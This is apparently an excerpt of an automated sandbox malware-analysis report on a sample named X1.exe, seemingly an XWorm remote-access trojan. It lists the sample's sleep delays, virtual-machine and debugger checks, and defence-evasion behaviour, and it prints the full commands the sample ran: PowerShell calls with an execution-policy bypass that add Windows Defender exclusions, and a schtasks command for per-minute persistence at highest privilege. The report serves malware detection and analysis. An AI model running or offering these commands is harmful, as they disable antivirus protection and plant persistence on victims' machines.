                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8406Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1080Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8131Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1498Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -599875s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -599658s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -599532s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -599407s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -599282s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -599157s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -599032s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -598907s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -598782s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -598672s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -598563s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -598438s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -598313s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -598188s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -598063s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -597954s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -597829s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -597704s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -597579s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -597454s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -597329s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -597204s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -597065s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -596928s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -596797s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -596496s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -596375s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -596253s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -596125s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -595022s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -594906s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -594797s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -594688s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\X1.exe TID: 5476Thread sleep time: -594578s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5020Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 736Thread sleep count: 8131 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 736Thread sleep count: 1498 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5376Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\X1.exe TID: 6436Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\X1.exe TID: 5308Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\X1.exe TID: 4824Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\X1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\X1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\X1.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\X1.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\X1.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 599875Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 599658Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 599532Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 599407Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 599282Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 599157Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 599032Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598907Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598782Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598672Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598563Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598438Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598313Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598188Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 598063Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597954Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597829Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597704Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597579Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597454Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597329Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597204Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 597065Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 596928Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 596797Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 596496Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 596375Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 596253Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 596125Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 595022Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 594906Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 594797Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 594688Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeThread delayed: delay time: 594578Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\X1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\X1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\X1.exeThread delayed: delay time: 922337203685477
                            Source: X1.exe.0.drBinary or memory string: vmware
                            Source: X1.exe, 00000000.00000002.3317632463.000000001BCC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\Desktop\X1.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F178C1 CheckRemoteDebuggerPresent,0_2_00007FF848F178C1
                            Source: C:\Users\user\Desktop\X1.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Roaming\X1.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\X1.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe'
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\X1.exe'
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\X1.exe'Jump to behavior
                            Bypasses PowerShell execution policy
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe'
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X1.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\X1.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\X1.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe"Jump to behavior
                            Source: X1.exe, 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                            Source: X1.exe, 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                            Source: X1.exe, 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                            Source: X1.exe, 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                            Source: X1.exe, 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
                            Source: C:\Users\user\Desktop\X1.exeQueries volume information: C:\Users\user\Desktop\X1.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\X1.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
